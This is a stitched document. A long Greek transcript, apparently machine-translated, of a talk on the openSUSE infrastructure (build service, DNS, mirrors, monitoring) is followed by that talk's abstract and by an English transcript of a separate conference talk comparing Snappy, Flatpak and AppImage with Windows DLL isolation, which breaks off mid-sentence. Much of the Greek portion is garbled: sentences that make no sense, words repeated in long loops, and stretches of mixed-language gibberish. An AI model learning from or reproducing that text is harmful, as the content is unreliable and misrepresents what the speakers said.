όλα αυτά. Λοιπόν, ήταν η ώρα να δούμε. Μετά από την τελευταία Απ' & Σουσέ το συμβείο μας, δυσκολοί, ένας ήταν στον Δηλή του Νορμπέρκου για τρεις πολύ πρόσταστιες σημερινές. Υπάρχουν πιο πολλές για αυτό στην Πακκάτι της Νέας και της Σουσέ's web page. Και φυσικά, είχαμε άλλη δημιουργία, το πρώτο στιγμό της αυτής. Υπάρχει άλλη πράγματα, είναι η πρακκάτιση που αυτή η στιγμή είχα πριν. Το συμβείο της απελευθέας που ήταν χρησιμοποιημένη ήταν ένα μικρό. Και οι πακκάτιες, οι πακκάτιες που χρειαζόμαστε που δεν ήταν στον δημιουργία, ήταν στον Σουσέ's ειδικαίωση της OBS. Αυτό το χρησιμοποιημένο, έχουμε έναν οπιστικό OBS στον Σουσέ's web page. Είναι η δημιουργία της OBS. Εδώ μπορείς να δεις τα πακκάτιες που βρίσκονται σε εσάς. Και μετά τα πακκάτιες, μπορείς να καταλαβαίνεις με τι πράγματα μας εξοπλούν. Ποια εξοπλούνται τα οποία οι πακκάτιες που βρίσκονται στους εξοπλούντων έχουν φαρνές. Αυτό το χρησιμοποιημένουμε τα πακκάτιες του OBS για εξοπλούντων εξοπλούντων της οικονομικής εξοπλούντων. Είναι também στους εξοπλούντων της OBS και είναι επίσης να φύγουν το τέτοιο Έμπιζο. Τα πακκάτιες της OBS είναι πολύ δυσκολού. Έχει μόνο για εξοπλούντων εξοπλούντων, για να φύγουν το τέτοιο Έμπιζο και να φύγουν το τέτοιο Έμπιζο που χρειαζόμαστε. Ένα πολύ σημαντικό εξοπλούντων που είχαμε φύγει το DNS τελειώσεις, μετά μερικές χρόνια. Το DNS, σαν εξοπλούντων, δεν ήταν χρειάζει από το Σοσίδι, ήταν χρειάζει από το Micro Focus IT. Λοιπόν, όταν χρειάζαμε έναν νέο νέο, το προσέγιο θα μπορεί να φύγει για δύο ή τρία δεύτερη χρόνια, αλλά για εξοπλούντων, ήταν πολύ σημαντικό για το δύο μας. Αυτό είναι τελειώσιο από το Σοσίδι, στην Φρύ-ΕΠΑ και από τότε είχαμε φύγει ένα μεγάλο κλειν-απλόντων της DNS, σπέστι στην δυνατότητα της internal domain. Βεβαίωσο, υπάρχει η διαφορετική της δυνατότητας μετά με τα χρόνια, το Σοσίδι, το Micro Focus IT. Βεβαίωσο, δύο μας, αλλά ήταν πολύ σημαντικό για δύο χρόνια, για τα δύο χρόνια που εγώ εξοπλούντας σε αυτή τη δυνατότητα, δεν ξέρω αν θα πρέπει να είναι τελειώσο, τώρα έχουμε μια εξοπλότητα για αυτή, και σε εξοπλότητα έχουμε δύο moreservices, δύο monitoring, τώρα έχουμε τώρα τι η εξοπλότητα εξοπλότητας είναι δύο. Υπήρχαν πολλές δυνατές για να μας βρήκουν να κλεινάσουν κάποιες εξοπλότητας, κάποιες εξοπλότητας, αλλά υπάρχουν πίσω δύο δυνατές, γιατί εξοπλότητας δύο δυνατές από το Σουσέ. Και άλλη σημαντική πιο σημαντική εξοπλότητα είναι ότι έχουμε μόνο δύο δυνατές. Είναι συμβουλία κάθε πρώτη σανή του μήν. Με 6 ώρα το UTC, δηλαδή 7 ώρα το βιντερικό το βιντερικό σαμερτικό. Είμαστε επικοινήσεις να μας βοηθούν. Είναι συμβουλία με το Λεωμαντικό Σουσέ. Οι εξοπλότητας είναι δηλαδή πριν τα δυνατές σε ένα μάσμα στο προέγγραμμα στο Λεωμαντικό Σουσέ. Λοιπόν, μπορείτε να επικοινήσεις τις εξοπλότητας αν θέλεις. Το μάσμα είναι κάτι που είχα μιλήσει. Το μονοτισμό, είναι ένα πολύ καλό μάσμα, μπορώ να πω. Είμαστε δηλαδή ένα μάσμα από το βιντερικό μεταξύ αυτή τη δηλαδή. Το μόνο που δηλαδή είναι ότι πολλοί της δηλαδής της Ανμοντικής Σουσέ νέα πράγματα στον their mind, αλλά όταν νέα άνθρωποι το βλέπουν, υπήρχε πρέπει να δηλαδήσουμε πιο και πιο σύμπροι προσέγειες. Λοιπόν, έχουμε ένα πολύ καλό μάσμα, πιο ευρωπαίωση, και πιο ευρωπαίωση. Και πάνω πάνω είναι ένα πρόγραμμα και δεν θα πηγαίνει. Δεν θα πηγαίνει καλύτερα. Το github, όπως είχα μιλήσει, είναι κάτι που είμαστε πιο καλό. Είμαστε δηλαδή να δηλαδήσουμε πολλοί νέοι. Και να έχουμε μάσμα για το εμφραστραξέ. Επισης, μετά από το συμφωνία της καταγωνίας, το σωστ. Λοιπόν, παιδίες, δεν θα δηλαδήσουμε πιο. Θα εξηγήσω πιο ευρωπαίωσης που έχω από πολλές άνθρωποι. Λοιπόν, καλώς μπορείς να δηλαδήσεις. Σε εμφραστραξέ. Σε εμφραστραξέ. Λοιπόν, έχω ένα άλλο 15 μήνες. Έχεις κάποιο ώρα να δηλαδήσεις. Λοιπόν, πρώτη παιδί. Ξέρουν ότι συνκ Isa είναι του σταύσεως... Ά mammissementsον χολυτεύκτης impairων πιστifier. Και φτηometry όλοι το πιστεια μας truth- greet, ένα εμφραστράξο αυτό από το σωστ. Έχουμε το εμφραστ ND'S' για να λ였θ我們的 άλλες μήνες, και ανάγκομα μας matar prompted το scripture. νέο π PAUL ρε μη πιστ никто. Απίστευτε από τις κρίες που η σύρυξη είναι αυτοί και είναι να μην χρειαζόνται μερικές παράδειγματα, ή μερικές παράδειγματα. Είμαστε διεθνικές ευκαιρήσεις, όπως η διεθνική ευκαιρήση, όταν οι πακοτές δεν είναι στον ευκαιρήσιο, αλλά έχουμε και την πόληση, ότι οι πακοτές θα πρέπει να μην χρειαζόνται μερικές ευκαιρήσεις, και μετά στον ευκαιρήσιο, και μετά στον επόμενο λίπη, για να μπορούμε να το δημιουργήσουμε από την πόληση της τρίτης. Η τρίτη της τρίτης είναι και ο πόλης που μονοιτήρες από την ευκαιρήση μας, γιατί έχουμε και τις δημιουργήσεις, αν κάτι είναι αυτοί. Έχουμε το GOS-ηματή που είχαμε μιλήσει και έχουμε το μηχανικό κομμάτι που μιλήσει σε κάθε μασίν, και να εμπιτεύει τα μασίν μας στον τέτοιο πόληση. Η επόμενη ευκαιρήση που έχουμε και το μηχανικό κομμάτι είναι πώς πολλοί είναι στην ευκαιρήση. Και η επόμενη ευκαιρήση είναι ότι δεν ξέρω. Είμαστε πολλοί και δεν είμαστε αρκετά. Και παιδίτε να μας δείξτε. Και η επόμενη ευκαιρήση που έχω είναι ότι αν κάποιος μπορεί να δείξει ή να βοηθεί την ευκαιρήση. Και η ευκαιρήση είναι, φυσικά, σκέφτη. Δεν έχουμε συμβουλή, είναι κάποια πόληση της ευκαιρήσης, και πρέπει να κάνετε δύο ασχεδοστάσεις για να δείξουμε μας. Ας εξαφαλήσαμε την ευκαιρήση σε κάτι πιο χαραγνή. Πώς μπορώ να δείξω την ευκαιρήση, πώς μπορώ να δείξω την ευκαιρήση. Οι κοινότητες της ευκαιρήσης, η κοινότητα της IRC, μπορείτε να μας δείξετε στην Ευκαιρήση, στην Ευκαιρήση της Ευκαιρήσης. Υπίστευτε να δείξετε τα δικατία μας. Είναι πάνω, είναι πάνω για την αφή σας. Θα δείξετε την ευκαιρήση της δικατίας που μπορείτε να δείξετε για δημιουργία των ευκαιρήσεις. Εννοείτε τα δικατία σας αν θέλετε να ξεχάσετε ένα στενό, ή αν θέλετε να κάνετε ευκαιρήσης δημιουργίας, τελειώσεις obviously. Και θα δείξετε την ευκαιρήση μας στην ευκαιρήση μας. Θα δείξετε την ευκαιρήση μας, αλλά δεν θα δείξετε την ευκαιρήση του τελευταία. Αυτό είναι κάτι που πρέπει να κάνετε από εσύ. Είναι η σύγχρονη σας εξαγνή σας. Η εξαγνή σας πρέπει να μας σημανήσει την εξαγνή σας, που δίνει εξαγνή σας να δίνει όλες τα μοσια. Αν μπορείς να κάνεις αυτό, αυτό μπορεί να πρέπει να δίνεις ότι γινόνεις γινόνεις, γινόνεις σοχτ, και είσαι έτοιμος να γνωρίσεις. Και τίποτα, πρέπει να χρειαστεί κάποιος που καταφέρει στους στους, να φύγει μύρω πίνκη. Βασίς λέει αυτήν την πράγματα, και κάποιος που χρειαστείς, είναι το πρόσφυγό μας. Μύρω πίνκη είναι η εξαγνή σας, και είναι η εξαγνή μας, η εξαγνή μας, η εξαγνή μας, η μύρω πίνκη. Ο μύρως της δημιουργίας μπορεί να μιλήσει τα δάτα, γιατί αν they change their IP, ή αν they change their bandwidth levels, they do not have to send us tickets every time to update information on our database. Βλέπουμε, πρέπει να χρειαστείς κάποιος που καταφέρει στους, και να βοηθήσει με το μύρω πίνκη. Από όλοι, πρέπει να βοηθήσουμε να είμαστε κριετές, γιατί υπάρχει πολλές δάτων, και δεν είναι τελειώσεις. Αν απαρα reversed, ο κατά Sulop σκοτήeden μπορεί να ο neighborhoods career, να είναι før και να είναι Pubduc, να είναι πόνο της sailing dev allemaal καλ logged port,wallet, Πριν να πω αυτό, θα πω ότι σε το σημερινό να προσπαθήσω αυτή η προσπαθή, παρακολουθώ όλα τα προσπαθή που συμβαίνουν κάθε χρόνια για την ΑΕΕ, την ΑΕΕ, και όλα αυτά τα πράγματα. Και έχω δει ότι πιο πολλές από τα πράγματα που είπαμε σήμερα, είναι πραγματικά πραγματικά πραγματικά από τα τελευταία χρόνια. Το σύστημα της τελευταίας, την αφαίωση των διεθνών, οργη reductions, ole strategy... Τα πρόσπαθήως Presentations, που δóbει, ότι θα πρέπει να spine wystμοι梦. Ε하신 μου, και δεν παρακαλώ θα underway's. Μια εισβάθεις, επέδειμμα. Αί Communist,étique για εισβάθ να κάνω εboro gelele, τα ξ θέματα στην Εδώψενονεύει Και Ένας α declared блиμμα. Το βρισκόρχο Βριν εργαλurger commonlyINSERVERSURETS, μαςπροσίωμα και κάivery από τη κüyorsunση, VISTA οι Ζ dippedemen δηλέ Humansικών, Ορ Давай των miteα για να καταλαβαίνουν το υπέρασμα, στη κάποια να beacon wooden Sud Not에도, που συσ Klar Applause, το wasp & chip, και το Thursday freeze. Είναι αρκετά για να το προσπαθήσουμε. Είναι πολύ σημαντικό να το βρεις. Πρέπει να δοκιμάσουμε περισσότερα βασικασία από το SUSE. Τώρα με το νέο προβοκογάσταρ, πρέπει να πρέπει να μιλήσουμε όλοι τα αρκετά βασικασία στο νέο βασικαστάρ. Πρέπει να διαφορεύουμε το μονιτήρι και πολλές άλλες βασικασίες που είχαμε μιλήσει πριν. Υπάρχει έναν μεγάλο πρόβλημα, και πρέπει να δοκιμάσουμε το CDN προβοκογάσταρ. Αυτό θα είναι πρώτος χρησιμοποιήματος για το στιγμό στις στιγμών. Και αν είναι πολύ σαν τα χρήματα, θα δοκιμάσουμε και για να μιλήσουμε περισσότερα βασικασία στον επόμενο. Αλλά αυτό είναι πολύ σαν το επόμενο. Έχουμε δοκιμάσει έναν εμπανιδοσογό, έναν εμπανιδοσογό, έναν εμπανιδοσογό, και το εμπανιδοσογό που είχαμε δοκιμάσει το εμπανιδοσογό, που δημιουργήσαμε μεταξύ των εμπανιδών που είχαμε δοκιμάσει το εμπανιδοσογό και το εμπανιδοσογό και από το internet, που δημιουργήθηκε σε πολύ σαν αμπανιδοσογό. Αυτό είναι τώρα σκέφτη. Αλλά δεν είναι σκέφτη σε όλες τις εμπανιδοσογό. Έχουμε αυτό το εμπανιδοσογό και από το εμπανιδοσογό, θα το βάζουμε ένας όμως εμπανιδοσογό, για να δούμε πιο προστασία για εμπανιδοσογό. Μεταξύ, το github, που είναι τώρα στο internet. Τι πρέπει να δούμε πιο σαπορτή από την κοινωνία στον σωστ, ειδικά σε φορμιουλές. Το εμπανιδοσογό είναι ένας πολύ σκέφτης εμπανιδοσογό. Είχαμε δοκιμάσει σε πιο σαν αμπανιδοσογό και πρέπει να δούμε πιο σαν αμπανιδοσογό. Είναι ένα σωστ, ειδικά σε φορμιουλές. Έχουμε δοκιμάσει σε πιο σαν αμπανιδοσογό, για να δούμε πιο σαν αμπανιδοσογό, για να δούμε πιο σαν αμπανιδοσογό. Έχουμε δοκιμάσει σε πιο σαν αμπανιδοσογό για να δούμε πιο σαν αμπανιδοσογό. Έχουμε δοκιμάσει σε πιο σαν αμπανιδοσογό για να δούμε πιο σαν αμπανιδοσογό. Επειδή αν παραopes τον τοιχ Pragua, το υ situaçãoροgem της τοποτιήδος πριν δια με suspected δ Pubic και τραβ passo 475 δεχμάθαι Sabio και πηγαίνει κανικό συνεύμα. Ό brown ρήγοια δ2017 και ζεν Yay optimization Μετά πράγματα, η ΕΕ και η Μαρτίνο θα σημαίνει πως θα είναι η πιο σύστητα της εργασίας, και θα είναι η πιο σύστητα της εργασίας, γιατί όλοι οι πολιτικές σημαίνει, αλλά θα είναι η αυτοπαίτητα μας. Βέβαια, ένα άλλο πρόσφυγμα που θέλουμε να κάνουμε είναι η πιο σύστητα της εργασίας, γιατί πρέπει να τα σχεδίξουμε πιο σύστητα της εργασίας, γιατί όλοι τα σχεδίξουμε πιο σύστητα της εργασίας, γιατί πρέπει να τα σχεδίξουμε πιο σύστητα της εργασίας, γιατί όλοι τα σχεδίξουμε πιο σύστητα της εργασίας. Ο πιο σύστητα που θέλουμε να τα σχεδίξουμε πιο σύστητα της εργασίας, είναι ένας δημής που μπορεί να κατανομιουθεί όλοι, όλοι δεν είναι δημιουθείς από εργασίας εργασίας. Ξεδηματογράφουμε να κάνουμε το ίδιο, για πολύ περισσότερα η αυτοπαίτητα για την ευρώτητα μας, για πολύ συσχεδίξη, και η ιδιαίτερη ιδιαίτηση που είχαμε was to put NTP servers under an open source domain to the public pool. Εννοείς να έχετε περισσότερα ιδιαίτες, είμαστε αρκετές και εσύ εσύ μπορείτε να μας βοηθήσεις. Αλλά μπορούμε να συμμετήσουμε νέες τίκες ή νέες ιδιαίτες εδώ στην παιδιά, ή η καλύτερη νέα κόρδο για την επόμενη νέα κόρδο. Αυτό είναι πιο πολύ όλα που ήθελα να πω. Τώρα θέλω να σας σημαίνω ότι αυτό είναι το Ανήθεια της Ανήθειας. Πάμε ένα χάκ, πάμε ένα μπιέρα, είμαστε 24-7 εξαλείς και όταν οι ασυνομιστές δεν είναι δουλειές. Και θέλω να μας βοηθήσεις να σκοτήσεις. Αν εμείς φτύξεις, πρέπει να φτύξεις. Ποια εξαλείς, κρατία. Είδατε πρόκειται με την εύκολη σας εξαλείς, αλλά η εξαλείς ήταν, για τα άνθρωποι που βλέπουν την εξαλείς, που δεν έχουν ασυνομιστές, πώς θα μπορούν να πηγαίνουν. Και θα σας εξαλείς ότι πολλές τις πράγματα που είσαι λιστές, είναι πράγματα που χρειαζόνουν υπέροχες. Είμαι πραγματικός, αν υπάρχουν μία πρόκειται, να μπορεί να κάνουν πράγματα που θα είναι σημαίνοντας να βοηθήσουν με την εύκολη σας εξαλείς. Υπάρχουν πράγματα που χρειαζόνουν υπέροχες, αλλά υπάρχουν πράγματα που χρειαζόνουν πολύ μεγάλη χρειαζόνου χρειαζόνου, που θα δούμε να δούμε στον κόσμο. Μπορούμε να δούμε στον κόσμο να δούμε στον κόσμο ή σε κάποιες δικαιώματα, αλλά δεν θα δούμε στον κόσμο, αντί το χρόνο παίζει ένας, πραγματικός, προβάσσιο. Μπορούμε να δούμε στον κόσμο, ή το χρόνο να μας σημαίνει το πρόκειται να δούμε στον κόσμο. Αλλά υπάρχουν πράγματα που μπορείς να κάνεις, για να βάζεις την εμφραστραξία, μετά μεγάλη χρειαζόνου χρειαζόνου. Μπορείς να μας βάζεις έναν χρόνο, να μας βάζεις με το σκοτ-φόρμιγας. Αυτό είναι ένα τοπικό που πρέπει να πω μεγαλύτερα η ώρα μου. Όταν κάτι δεν είναι βραζόν, θα πω το σκοτ-φόρμιγας, πιο. Λοιπόν, αν κάποιος θέλει να βάζεις, αυτό χρειαζόνει ουσιακότητα εξαιρετικότητα. Και είναι ένα πολύ πιο σημαντικό πρόκειται, γιατί όταν αυτό θα έρθει, θα διδελείται και 3000 σκοτ-φόρμιγες, διότι θα δούμε. Ακούς το πρόκειται, πιστεύω. Καρήσιν θέλει να πω κάτι για το βιγκί, δεξάει. Εκεί έχω ένα ανοιγημένο να κάνω. Λοιπόν, πιστεύω ότι έχουμε να επαναγωθεί το βιγκί για πολύ λόγω, και το πιστεύω για το σκοτ-φόρμιγας, δεξάει. Λοιπόν, έχω κάποιο χρειαζόνι για εσένα. Ποίτε το πρόσοδο στο en.test.open.sus.org και θα δούμε τι είναι το βιγκί μας. Δεν είναι μόνο έναν νέο βιγκί, πιστεύω, αλλά έχουμε και κάποιες νέες εξένειες. Για παράδειγμα, όλοι πιστεύουν για το βιγκί. Είμαστε δεξάει. Λοιπόν, κάτι που αντιμετωπίζουν, ποιος ήταν το δοκιμινό, πιστεύω από το βιγκί για το γητάπ. Ναι, πιστεύει, ποιος αντιμετωπίζει, αλλά το πρόσοδο είναι, πιστεύω, μπορείς να συμβείς το δοκιμινό από το γητάπ. Δεν πιστεύεις πού είναι, πιστεύεις. Υπάρχει ένα άλλο τεχνικό μεταγράφι, που τώρα χρησιμοποιούμε το ανοίγμα στον φόρο, αλλά δεν πιστεύεις, είναι πιστεύεις το βιγκί. Τότε, πιστεύουμε το βιγκί για τα δεξάει, που ήταν δεξάει χρόνια, πριν όταν χρησιμοποιούμε, πιστεύεις το βιγκί, το μπλήμα, το μπλήμα, το μπλήμα. Ναι, και κάτι, αλλά πιστεύεις στον φόρο, γιατί αν θα μιλήσω όλοι, θα πιστεύεις να πιστεύεις. Και πριν, αν βρίσκεις κάτι που είναι πιστεύει στον φόρο, πιστεύεις, πιστεύεις, να πιστεύεις το μπλήμα στον φόρο, για να εξαφαλείτε το αδμήν στον Ωπανσούς Ωαγ. Ευχαριστώ για το αδμήν. Είναι αδμήν στον Ωπανσούς Ωαγ, πιστεύεις, πιστεύεις. Ποια εύκολα πρόσματα, ναι. Ποια εύκολα πρόσματα, πιστεύεις, πιστεύεις, πιστεύεις, πιστεύεις, πιστεύεις, πιστεύεις, πιστεύεις, πιστεύεις, πιστεύεις, πίστεύεις. και το μυαλό της μυαλής μυαλής είναι βασικός εδώ. Η πρόσφυγηση είναι ότι έχουμε προς, σε ρηγινές like APEC, που μας δίνει πρόσφυγες ιδέες για ποιοί διεθνούνται οι διεθνούνες πρόσφυγες σε δυσκές ρηγινές της κόσμου. Η μυαλή είναι κάτι που θα είναι πολύ καλύτερη όταν έχουμε το προβόγο ΚΟΚΑΣΤΟΡΑΛΗ. Οι πρόσφυγες που είσαι πρόσφυγες είναι κάτι που ξέρουμε. Για την πρόσφυγηση της διεθνούνες πρόσφυγες, έχουμε σαν την κερδίδια της κερδίδας, και η Αρσήν Κοπενσουσία εδώ στην Ευρώπη. Είναι ρανότητα και ένα σπόσης, δεν είναι ρανότητα. Η κερδίδα είναι δηλαμβάνητα από αυτή τη διεθνούντα. Το πρόβογο που έχουμε στις τώρα είναι στην U.S. πιο πιο. Δεν είναι στην Ευρώπη. Είναι πιο πιο πιο, αλλά στην Ευρώπη έχουμε πιο πιο πρόβο με την κερδίδια, και θα είναι πιο πιο σύντομα με το πρόβογο. Πολλογεία για Αιπέκ, like Αστραλία και Αζιά. Είναι πιο πιο, δεν έχουν πιο πιο πιο λόγο, και είναι πιο πιο πιο πιο, με τα κομμινότητα. Δεν υπάρχει πιο πιο πιο πιο λόγο, αλλά είναι πιο πιο σύντομα με την κερδίδα που σας μιλήσετε, που θα είναι πιο σύντομα. Πολλογεία γιατί, αυτοί, υπάρχουν πολλά πράγματα εδώ. Πολλογεία γιατί, ποιο πιο πιο πιο λόγο, είναι πιο πιο πιο λόγο, διότι, πολλογεία, πιο πιο πιο λόγο. Δεν είμαι πιο πιο πιο λόγο. Είναι πιο πιο λόγο... Δεν είναι πιο δύσκολο να καρκουλήσει, γιατί υπάρχουν δυο πιο πιο λόγες, πιο πιο πιο δύσκολο να καρκουλήσει, γιατί υπάρχουν δυο πιο λόγες, γιατί υπάρχουν δυο πιο λόγες, πιο δύσκολο να καρκουλήσει, αλλά υπάρχουν δυο πιο πιο λόγες. Αν θέλατε να καρκουλήστε, πιστεύω ότι έχουμε δυο πιο λόγες. Ναι, πιστεύω πιο πιο δύσκολο να καρκουλήσει. Πιστεύω πιο δύσκολο να καρκουλήσει, γιατί πιστεύω πιο δύσκολο να καρκουλήσει. Πιστεύω πιο δύσκολο να καρκουλήσει. Πιστεύω πιο δύσκολο να καρκουλήσει. Ναι. Ευχαριστώ. Ευχαριστώ.
The openSUSE Infrastructure Once again, the team behind the administration, support and maintenance of the openSUSE infrastructure is here to present services, machines and people, and all of the improvements after the renaming of the team on oSC16.
10.5446/54461 (DOI)
Wow. Thanks everybody for coming. It's like the last, well, second to last talk for me. After this, we've got the board meeting in the main hall and then we're done. So I'm Richard. I'm here to talk about, well, dinosaurs or as most other people know them, containerized applications and how we need to deal with them. Now they're out there. Now users are really using them. Now we're starting to see the problems with them in the real world. And this is a variation on talk I did at FOSSTEM earlier in the year. So I'm going to start out rehashing a lot of that. So if you've seen my talk, I'll try and run through it a little bit quicker. And if you haven't and you're more interested, you can go back and watch that. And then I'll talk about some of the new and exciting stuff and why I had to rewrite my slides twice during this conference. But really, when I started looking at these technologies, looking at Snappy, looking at Flatback and looking at App Image, it struck me that I'd seen all of this before. And in fact, where I first sort of saw similarities was actually back in sort of the Windows architecture, the original Windows application architecture and how Windows deals with loading up libraries and dependencies in the Windows world. And I mean, to start off with, look at it from another perspective, Linux has a lot of traditional Linux, traditional Linux packaging has an awful lot in common with Windows 3.1. It's a similar world. There is no ABI backwards compatibility. Things are constantly changing. Things are constantly evolved. There's one great big file system where everything is dumped into Windows, Windows system or C Windows, global identifiers for all the symbols that everything starts clashing all over the place. It's an absolute maintenance nightmare. And it's where the term DLL comes from. Because ultimately, all developers want to do is have a nice, well, simple environment to work with. And in the Windows 3.1 world, they had to development and test every single possible DLL combination that might be seen in the wild possibly anywhere. And then every time they had a patch, test that app patch in every single combination everywhere. And then when there was a dependency or library patch, test everything in every single combination everywhere. And they would do that and they would try and Windows was being used everywhere and then they'd cry because it would all break anyway and it would all go horribly, horribly wrong. And Microsoft thought they could fix this. And they tried very, very well to do that. And they were somewhat successful. Now, Windows 2000 introduced this concept of side-by-side assembly, which is basically containerization or application isolation for the Windows world. Having a separate memory space for every single application and all of its DLLs, loading up those DLLs privately from a folder in the file system, having Windows files protection, doing disk isolation of system DLLs, and having these fancy tools to audit all of that and migrate those legacy applications and deal with those problems. And you ended up with this wonderful situation, if you're a Windows user, where your Windows 2000 or later could run an application for Win32 or even for POSIX or even OS2, or using these fancy little runtimes that were packaged up in that Windows environment. So, problem solved, right? Well, no, of course, it all went horribly wrong. And not just because it was Microsoft doing it. There were very, very real sort of social and practical problems that evolved over time that we all saw. It was a security nightmare. All of these libraries, all of these dependencies end up lurking in countless folders, all being maintained to various degrees by the developers that put them there, all then becoming lovely security vulnerability, security gaps, attack services for things like WannaCry and other malware to go and abuse and misuse when certain applications are loaded in memory and loading up the bad DLLs in question. It's also maintenance nightmare as a user. How do you then update that application on the user's machine? Anyone using Windows, how many application uploaders do you have in your system tray? I mean, everyone builds another system update. And it just doesn't scale. It ends up, especially in the open source world, being a bit of a legal nightmare, one of the biggest issues of getting open source software in Windows is actually this problem. It's actually figuring out, okay, can we put this open source DLL in this container with everything else we need to put in there to get the thing working? And we, in the case of the Windows world, with these DLL-encompassed applications, the developer is the distributor. They have to worry about those legal issues and those legal concerns. But there is one bunch of people happy, hard disk vendors, because everybody's using up more disk space. People need more bytes. It's not terrible. And this was, yeah, like I said, since 2000. Meanwhile in Linux land, we were looking on smugly because we'd already solved all these problems. Sort of. And the way we solved these problems was with the traditional Linux distribution. And primarily, the things that distributions brought to the table and still bring to the table today, isn't the technical stuff per say. We all solve the technical problems in our own way. We all have our different package managers and our different philosophies on how you should do this engineering and packaging stuff. But the universal thing we all really bring to the table is we care about the security of the operating system and its applications in the context of a user looking after it. We're maintaining this stuff. We're auditing this stuff. We're constantly monitoring CVEs, pushing out these updates. And especially with the open source side of things, a major security vulnerability needs to be handled in a very particular way. You're going to have embargoed security mailing lists. You need to have trusted people on there. So you need to have the right people there. You need to have the right relationships there to get on those embargoed lists. And distributions play that key role of being there and able to get those fixes out before issues start hitting your code tree. And like I said, maintaining it, packaging those updates, keeping them updated, dealing with upstreams, helping work with upstreams with that. And lawyers auditing all of this stuff, checking it's compatible, making sure that the license is being chosen are sane and consistent with each other. So when I talk about this distribution stuff, you know, lots of people and it's kind of spawned by these new technologies or this kind of resurgence of the bundled application side of things of, you know, shared libraries are a problem. We're trying to solve the shared library problem. Dependencies are a pain in the ass. You know, I don't want to worry about the dependencies. I just want to worry about my app. Shared libraries do solve real problems. It's not just a case of being more efficient on disk, although that is a benefit as well. But having fewer libraries to worry about, having fewer dependencies to worry about, or having fewer repeating copies of the same dependency to worry about is a very beneficial thing. You know, when something goes wrong, when something is insecure, you have fewer copies of that thing to worry about. You have fewer places to patch. You have less manpower required to patch it. Less double work sending multiple copies of your vulnerable lib SSL out there or your vulnerable SAMBA libraries out there. And that makes it easier to then review it both as a user and as a distributor or as a developer who is distributing and ensuring that legal and security compliance, you know, this is something you can trust and rely on today, tomorrow. And also when it stops being maintained, it's still doing it in a way that's, you know, at least was saying at the time of stopping it. So from the open source sort of distribution side of things, mission accomplished, right? Well, no, like I already said, the open source distribution way of doing things was very similar to actually how Windows did it. You know, we still had these problems. We still had the issues of compatibility of making sure all these bits and pieces work together, of, you know, portability. How does an application built in one context work elsewhere? And how do you handle this issue of keeping something, keeping this software being delivered and just working and handling the fact that the open source world and therefore everything you're distributing is moving at a constantly changing pace of change. But we're not Windows. And when you're distributing in the open source world, there's different factors at play. So thinking about the compatibility issue, we all end up doing different distributions. We all end up having different libraries and different applications. Different applications require different libraries so the problem becomes exponentially complicated. And application developers don't want to worry about all that mess. They just want to deliver their software in the hands of users. I get it. They don't want to have to worry about which choice of dependencies did certain distributions pick. But most of the time they don't have to. In reality, distributions have their own maintainers. We have our own communities all here who care about this stuff and this part of it. And are the sort of the second tier making sure that the application gets in the hands of users. And you care about it in the same way as the upstream maintainers care about it. So very rarely does it really become a problem because most times it is really being done by the distro maintainers who care about this. And that's what you all do and that's what we've been doing for years and we're bloody good at it. As you can just see in Tumbleweed where we repeatedly ship stuff as fast as the upstream shipping it. But it is importable. It's open SUSE, bi open SUSE, for open SUSE. And an application developer wants to make sure that their software runs in a many different context as possible and as many different distributions as possible. And they don't want to learn a whole bunch of different build tools and they don't want to learn 20 different ways of doing things and they don't want to retest it 20 different places. But again, distribution communities often take care of that problem for the application developers anyway. And then pace of change. Every distribution does everything at a different pace. Heck, if you're open SUSE we do it at two different places. We'd leap, we'd do it regularly every year with major versions every few years and we do Tumbleweed where we just go nuts and as fast as every upstream wants us to go. But in the traditional old fashioned way of doing things, the regular release process gets in the way of that application delivery desire. In the traditional model you can't necessarily run the latest version of software on your stable open SUSE or your Debian system. Debian in particular is the perfect example because they freeze so well and so hard and so solidly that that becomes even harder and they're proud of that. Leap we purposefully design it in a way to try and bend the issue around the edges and deliver faster stuff when we can, how we can. We have the build servers, we have OpenCure to help with that. But it's still a very real problem. Sometimes we just have to say no because the technology can't do it. But that problem, that balance, how do we deliver this software? That is again something that distributions do currently take care of. So how much of a problem is it really? Doesn't matter. App image, flat packs, and App here to solve all the problems left anyway. And they exist to solve that issue. They exist to try and move these problems out of the hand of the distributions or reduce the need for the distributions to do this. So application developers can get that software in the hands of users at the pace the application developers want to be. And they do so by providing a bundle containing the app and the libraries, all the dependencies they need in then some kind of container or context or bubble or whatever. I'm going to keep on saying container although technically speaking, you know, that's open for interpretation. And the big promises of all these technologies, despite details around the edges of how they do things, is to solve all these compatibility and portability issues. It's only going to have the compatible libraries in the bundle. So you don't have to worry about anything from the distribution. You just put your application there, everything you need, you know. It will be portable. It will work everywhere because all the dependencies will be solved in there. You'll never have to worry about what does a distribution ship. And of course that means you can ship it at the pace you want whenever, however, don't have to worry about what the distribution is doing. And it's just going to work. And it's going to be wonderful. That's the promise. And then you have nice architecture diagrams like the snappy one here, or you have really stupidly complicated architecture diagrams like the flatback one, where you have this kind of model of, you know, just ignoring the operating system down the bottom pretty much. It's just there. And then there is some layer on top of that, be it the frameworks or the run times, which, you know, provide this sort of layer of dependencies, which are an awful lot like the dependencies the distributions are currently doing anyway. And then the bundle itself contains the library, the code, the application, everything's fine. But it doesn't work. In practice, it doesn't work. Most of the time it does, but there are still some very, very real issues there. And in fact, the biggest problem that comes around in reality when you start using these in production is this issue of, you know, compatibility and portability. The myth is not true. Because at some point, be it app image, flatback or snappy, there are some assumptions made about the stuff below the system. And we talked about this. Like, you know, in the case of snaps, you know, that is still the kernel. You know, everything above the kernel is assumed to be delivered by some snap somehow. But no kernel is equal. You know, every distribution has a different kernel with different conflicts. There's still problems there that get introduced by different, you know, by different kernel arrangements. We see this in OpenSUSE most actually with Steam, which isn't using one of these technologies, but basically uses the same approach of having a containerized Steam, you know, runtime that gets put in your user area and run that way. And everything was fine on OpenSUSE with Steam for the longest time. It just worked. It did its job. We could move everything in OpenSUSE and everything was fine. And then we changed our Glib C and it exploded spectacularly because their Steam runtime was built with an older Glib C and therefore nothing would run anymore. All those libraries would go horribly, horribly wrong until we started scripting around injecting our Glib C into there and rebuilding everything. And it was a complete mess. And we've seen this issue with flatpacks. We've seen this issue with some of the experience with snaps. We've seen the issue sometimes with app images. But one of the nice things and one of the reasons why I've always come into this liking app image is at least app image documents this problem. You know, it's stated there that it isn't trying to be a universal portable application solution. You're going to have to gather the binaries for the dependencies for the distributions you're targeting. You're not going to magically solve this problem everywhere. But that means that if you're using these technologies, you still have to worry about all of the compatible dependencies which might not be provided by any distribution you might want to run it on. That's a lot of stuff to worry about. Heck, that's the stuff that we all 